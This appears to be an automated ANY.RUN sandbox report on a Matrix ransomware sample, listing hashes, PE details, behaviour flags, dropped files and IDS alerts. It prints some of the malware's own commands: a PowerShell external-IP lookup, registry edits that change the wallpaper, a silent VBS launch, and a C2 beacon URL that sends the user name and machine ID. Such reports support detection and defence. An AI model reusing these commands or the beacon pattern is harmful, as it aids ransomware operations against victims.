analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

605aa9d2574dbac1134f8ffa18edb1ad

Full analysis: https://app.any.run/tasks/407818e7-aa6e-42e1-89ca-6fc8f0b5dfcb
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: September 30, 2020, 07:15:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
trojan
ransomware
matrix
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

605AA9D2574DBAC1134F8FFA18EDB1AD

SHA1:

0C177A08A07A99BA29534964BADE32CC71B71049

SHA256:

32A8ABF4EFFC5B26531BA76869B168B89DED225C0B0BBDB97FEC6920C8BCBEC7

SSDEEP:

49152:zXlabPyyNHb/GMO6d+5M+HKXlayIsy81hvfG:TQFC6s5M+HInh3G

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 1752)
    • Connects to CnC server

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
    • MATRIX was detected

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 2848)
      • cmd.exe (PID: 2600)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2060)
      • schtasks.exe (PID: 2720)
    • Application was dropped or rewritten from another process

      • pkAh9d2W.exe (PID: 1692)
      • pkAh9d2W.exe (PID: 1560)
      • pkAh9d2W.exe (PID: 2780)
      • pkAh9d2W.exe (PID: 3896)
      • pkAh9d2W.exe (PID: 748)
      • pkAh9d2W.exe (PID: 3608)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3772)
      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 748)
      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
    • Starts itself from another location

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
    • Starts CMD.EXE for commands execution

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
      • wscript.exe (PID: 3944)
      • cmd.exe (PID: 4092)
      • cmd.exe (PID: 3864)
      • cmd.exe (PID: 2392)
    • Executes scripts

      • cmd.exe (PID: 2156)
    • Changes the desktop background image

      • reg.exe (PID: 3992)
      • reg.exe (PID: 2008)
      • reg.exe (PID: 4060)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 2112)
    • Checks for external IP

      • powershell.exe (PID: 3772)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 4092)
      • cmd.exe (PID: 3864)
      • cmd.exe (PID: 2392)
    • Application launched itself

      • cmd.exe (PID: 4092)
      • cmd.exe (PID: 3864)
      • cmd.exe (PID: 2392)
    • Creates files like Ransomware instruction

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
    • Creates files in the program directory

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • 605aa9d2574dbac1134f8ffa18edb1ad.exe (PID: 2100)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 EXE PECompact compressed (generic) (63.7)
.scr | Windows screen saver (20)
.exe | Win32 Executable (generic) (6.9)
.exe | Win16/32 Executable Delphi generic (3.1)
.exe | Generic Win/DOS Executable (3)

EXIF

EXE

Subsystem: Windows command line
SubsystemVersion: 5
ImageVersion: -
OSVersion: 5
EntryPoint: 0xdca54
UninitializedDataSize: -
InitializedDataSize: 304640
CodeSize: 912384
LinkerVersion: 2.25
PEType: PE32
TimeStamp: 2018:08:11 04:45:24+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_CUI
Compilation Date: 11-Aug-2018 02:45:24
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0050
Pages in file: 0x0002
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x000F
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x001A
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 10
Time date stamp: 11-Aug-2018 02:45:24
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_BYTES_REVERSED_HI
  • IMAGE_FILE_BYTES_REVERSED_LO
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000DA4A8
0x000DA600
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.38205
.itext
0x000DC000
0x00004434
0x00004600
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
5.67426
.data
0x000E1000
0x00005AF8
0x00005C00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
6.19203
.bss
0x000E7000
0x000063F4
0x00000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.idata
0x000EE000
0x000010BA
0x00001200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.84046
.didata
0x000F0000
0x000000FA
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
1.88633
.edata
0x000F1000
0x00000064
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
1.18928
.tls
0x000F2000
0x00000014
0x00000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rdata
0x000F3000
0x0000005D
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
1.35651
.rsrc
0x000F4000
0x00043200
0x00043200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.95979

Resources

Title
Entropy
Size
Codepage
Language
Type
4086
3.32131
1164
UNKNOWN
UNKNOWN
RT_STRING
4087
3.53223
880
UNKNOWN
UNKNOWN
RT_STRING
4088
3.21677
956
UNKNOWN
UNKNOWN
RT_STRING
4089
3.32761
996
UNKNOWN
UNKNOWN
RT_STRING
4090
3.35065
944
UNKNOWN
UNKNOWN
RT_STRING
4091
3.28236
208
UNKNOWN
UNKNOWN
RT_STRING
4092
3.18964
160
UNKNOWN
UNKNOWN
RT_STRING
4093
3.34125
768
UNKNOWN
UNKNOWN
RT_STRING
4094
3.26231
968
UNKNOWN
UNKNOWN
RT_STRING
4095
3.36348
800
UNKNOWN
UNKNOWN
RT_STRING

Imports

advapi32.dll
kernel32.dll
kernel32.dll (delay-loaded)
netapi32.dll
ole32.dll
oleaut32.dll
shell32.dll
user32.dll
wsock32.dll

Exports

Title
Ordinal
Address
TMethodImplementationIntercept
1
0x00050868
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
83
Monitored processes
37
Malicious processes
2
Suspicious processes
5

Behavior graph

Click at the process to see the details
start #MATRIX 605aa9d2574dbac1134f8ffa18edb1ad.exe cmd.exe nwl8ffhk.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs reg.exe no specs wscript.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs attrib.exe no specs cacls.exe no specs takeown.exe no specs cmd.exe no specs pkah9d2w.exe no specs pkah9d2w.exe no specs cmd.exe no specs attrib.exe no specs cacls.exe no specs takeown.exe no specs cmd.exe no specs pkah9d2w.exe no specs pkah9d2w.exe no specs cmd.exe no specs attrib.exe no specs cacls.exe no specs takeown.exe no specs cmd.exe no specs pkah9d2w.exe no specs pkah9d2w.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2100"C:\Users\admin\AppData\Local\Temp\605aa9d2574dbac1134f8ffa18edb1ad.exe" C:\Users\admin\AppData\Local\Temp\605aa9d2574dbac1134f8ffa18edb1ad.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
748"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\admin\AppData\Local\Temp\605aa9d2574dbac1134f8ffa18edb1ad.exe" "C:\Users\admin\AppData\Local\Temp\NWl8fFhK.exe"C:\Windows\system32\cmd.exe
605aa9d2574dbac1134f8ffa18edb1ad.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2280"C:\Users\admin\AppData\Local\Temp\NWl8fFhK.exe" -nC:\Users\admin\AppData\Local\Temp\NWl8fFhK.exe605aa9d2574dbac1134f8ffa18edb1ad.exe
User:
admin
Integrity Level:
MEDIUM
1752"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\admin\AppData\Local\Temp\YPBFtIBG.txt"C:\Windows\system32\cmd.exe605aa9d2574dbac1134f8ffa18edb1ad.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3772powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2112"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\admin\AppData\Roaming\EjyqEBKg.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /fC:\Windows\system32\cmd.exe605aa9d2574dbac1134f8ffa18edb1ad.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2156"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\admin\AppData\Roaming\oU38eThu.vbs"C:\Windows\system32\cmd.exe605aa9d2574dbac1134f8ffa18edb1ad.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2008reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\admin\AppData\Roaming\EjyqEBKg.bmp" /f C:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3944wscript //B //Nologo "C:\Users\admin\AppData\Roaming\oU38eThu.vbs"C:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3992reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f C:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
455
Read events
375
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
3 558
Text files
321
Unknown types
116

Dropped files

PID
Process
Filename
Type
3772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KL63SGXQSQNBHE2LKN78.temp
MD5:
SHA256:
1752cmd.exeC:\Users\admin\AppData\Local\Temp\YPBFtIBG.txt
MD5:
SHA256:
2100605aa9d2574dbac1134f8ffa18edb1ad.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Microsoft Office\Office14\1049\PROTTPLN.XLSbinary
MD5:C949F6F31694B327D0A674CE91250A30
SHA256:37F305FAFD64492418FDCB3B369451D498D8BA4A4D0184D04746BB8B34A379A3
2100605aa9d2574dbac1134f8ffa18edb1ad.exeC:\Users\admin\AppData\Local\Temp\78.153.204.5_log.txttext
MD5:082A92B49F5B08D5BBE5892F078C0EA1
SHA256:003F09A2F987DDAEBA6538C890254A961AC6B86F301756A1DCB44DEE8455F7CE
2100605aa9d2574dbac1134f8ffa18edb1ad.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Microsoft Office\Office14\1031\PROTTPLN.XLSbinary
MD5:B5E818676C06CAB4FF220DD324B3519A
SHA256:9A9BA7EF34E46095B6BC820F64D6FE90124F2F9C0A707B4D9CBBCC87A3033CB4
3772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
748cmd.exeC:\Users\admin\AppData\Local\Temp\NWl8fFhK.exeexecutable
MD5:605AA9D2574DBAC1134F8FFA18EDB1AD
SHA256:32A8ABF4EFFC5B26531BA76869B168B89DED225C0B0BBDB97FEC6920C8BCBEC7
2100605aa9d2574dbac1134f8ffa18edb1ad.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Microsoft Office\Office14\1031\QuickStyles\Simple.dotx
MD5:
SHA256:
2100605aa9d2574dbac1134f8ffa18edb1ad.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\Microsoft Office\Templates\1041\ADDRESS20.XLSXbinary
MD5:6C728546EF645C2F8E1BB8DA9AA02D69
SHA256:FCE05211F213DF57029A786AE1684CED440B437C7BE9DD33896192CD1D18F5BB
2100605aa9d2574dbac1134f8ffa18edb1ad.exeC:\Users\admin\AppData\Roaming\oU38eThu.vbstext
MD5:BE09F6F19E4ACAB8AA6ABA2D762788F2
SHA256:7D13F3AD11F282EB859FED166E313DF233D7E990C7878B159C7075BC8F14E67B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3772
powershell.exe
GET
200
216.239.32.21:80
http://myexternalip.com/raw
US
text
12 b
shared
2100
605aa9d2574dbac1134f8ffa18edb1ad.exe
GET
410
145.14.144.114:80
http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=USER-PC|admin&sid=Vx7qa7vKNygXOhGU&phase=5AEA358E691F0A25|16997|3GB
US
html
16.5 Kb
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2100
605aa9d2574dbac1134f8ffa18edb1ad.exe
145.14.144.114:80
fredstat.000webhostapp.com
Hostinger International Limited
US
shared
3772
powershell.exe
216.239.32.21:80
myexternalip.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
fredstat.000webhostapp.com
  • 145.14.144.114
shared
myexternalip.com
  • 216.239.32.21
  • 216.239.34.21
  • 216.239.38.21
  • 216.239.36.21
shared

Threats

PID
Process
Class
Message
3772
powershell.exe
Potential Corporate Privacy Violation
ET POLICY External IP Check myexternalip.com
2100
605aa9d2574dbac1134f8ffa18edb1ad.exe
A Network Trojan was detected
ET TROJAN MSIL/Matrix Ransomware CnC Activity
2100
605aa9d2574dbac1134f8ffa18edb1ad.exe
A Network Trojan was detected
RANSOMWARE [PTsecurity] Matrix
No debug info